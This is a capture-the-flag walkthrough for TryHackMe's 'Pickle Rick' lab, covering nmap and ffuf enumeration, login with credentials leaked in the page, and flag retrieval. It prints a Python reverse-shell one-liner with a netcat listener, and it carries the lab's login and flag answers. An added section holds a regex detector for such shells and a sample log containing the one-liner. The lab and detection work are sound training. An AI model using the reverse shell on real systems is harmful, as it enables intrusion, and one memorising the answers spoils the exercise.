Pickle Rick TryHackMe Walkthrough

This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.

Today we will see how to solve a capture the flag challenge called “Pickle Rick”. It is a penetration testing lab available at TryHackMe. This challenge gives hands-on practice with basic penetration testing techniques such as scanning, enumeration, and privilege escalation.

Credit for the machine goes to TryHackMe.

  Level: Easy

# What is the first ingredient Rick needs?

First of all, we scan the machine IP with nmap to check which services are running on the machine. We found that an HTTP service is active on port 80.

We now view the page source of the website to see if we can get some hints. Here we found the username.
Username -> R1ckRul3s

Next, we looked for accessible paths using the tool ffuf. The scan found 2 of them: index.html and robots.txt.
command -> ffuf -t 100 -c -w /usr/share/dirb/wordlists/common.txt -u http://<machine_ip>/FUZZ

Then we open the paths we found. We found a value in robots.txt.

We now search for a login page. Scanning the website further, we found a login page, “login.php”.

Open the login page and enter the username and password we initially found.

Username -> R1ckRul3s
Password -> Wubbalubbadubdub

We then get a command panel.
command -> ls

The Sup3rS3cretPickl3Ingred.txt file contains the first flag!

# What's the second ingredient Rick needs?

Since we don't have superuser access, we have to escalate our privileges.

To do this we used the following python3 one-liner, which connects back to our listener and gives us a reverse shell.
Command:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<machine_IP>",<Port_no>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Before executing the command, start a listener on the chosen port.
command -> nc -lnvp <port_no>
-l => listen for an incoming connection
-n => numeric-only addresses (no DNS lookups)
-v => verbose output
-p => port number to listen on

After executing the command we will get a reverse shell.
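
From the defender's side, the one-liner above leaves a recognisable process command line. The following added example (not part of the original walkthrough) flags such invocations in process-execution records; the log format, the sample records and the web service account names are constructed assumptions.

```python
import re

# Constructed sample process-execution records (not from the original page).
# Assumed format: "<time> user=<user> parent=<parent process> cmd=<command line>"
SAMPLE_LOG = """\
10:01:12 user=www-data parent=apache2 cmd=ls
10:02:40 user=www-data parent=apache2 cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("203.0.113.5",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
10:03:05 user=deploy parent=sshd cmd=python3 -c 'import json,sys;print(json.load(sys.stdin)["version"])'
10:04:18 user=www-data parent=apache2 cmd=cat Sup3rS3cretPickl3Ingred.txt
"""

RECORD = re.compile(r"^(\S+) user=(\S+) parent=(\S+) cmd=(.*)$")

# Traits of the walkthrough's one-liner; each alone is common, together they are not.
INDICATORS = {
    "inline_interpreter": re.compile(r"\bpython[0-9.]*\s+-c\b"),
    "socket_connect": re.compile(r"socket\.socket\(.*\.connect\("),
    "stdio_redirect": re.compile(r"dup2\([^)]*\)\s*,\s*[012]\)"),
    "interactive_shell": re.compile(r"/bin/(ba|da|z)?sh\b"),
}

# Assumed names of accounts that run the web application.
WEB_SERVICE_USERS = {"www-data", "apache", "nginx"}


def find_reverse_shells(log_text):
    """Return one alert per record that opens a socket and wires it to a shell."""
    alerts = []
    for line in log_text.splitlines():
        m = RECORD.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        time, user, parent, cmd = m.groups()
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(cmd))
        # Require the outbound connection plus at least two other traits.
        if "socket_connect" in hits and len(hits) >= 3:
            severity = "high" if user in WEB_SERVICE_USERS else "medium"
            alerts.append({"time": time, "user": user, "parent": parent,
                           "severity": severity, "indicators": hits})
    return alerts


if __name__ == "__main__":
    for alert in find_reverse_shells(SAMPLE_LOG):
        print(alert)
```

A web service account spawning an interpreter that connects out and attaches a shell is rated high because the web application itself has no reason to do so.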


Traverse the directories to find flag 2!
command -> cat 'second ingredients'

# What's the final ingredient Rick needs?

Traverse the directories to find flag 3!
command -> cat 3rd.txt
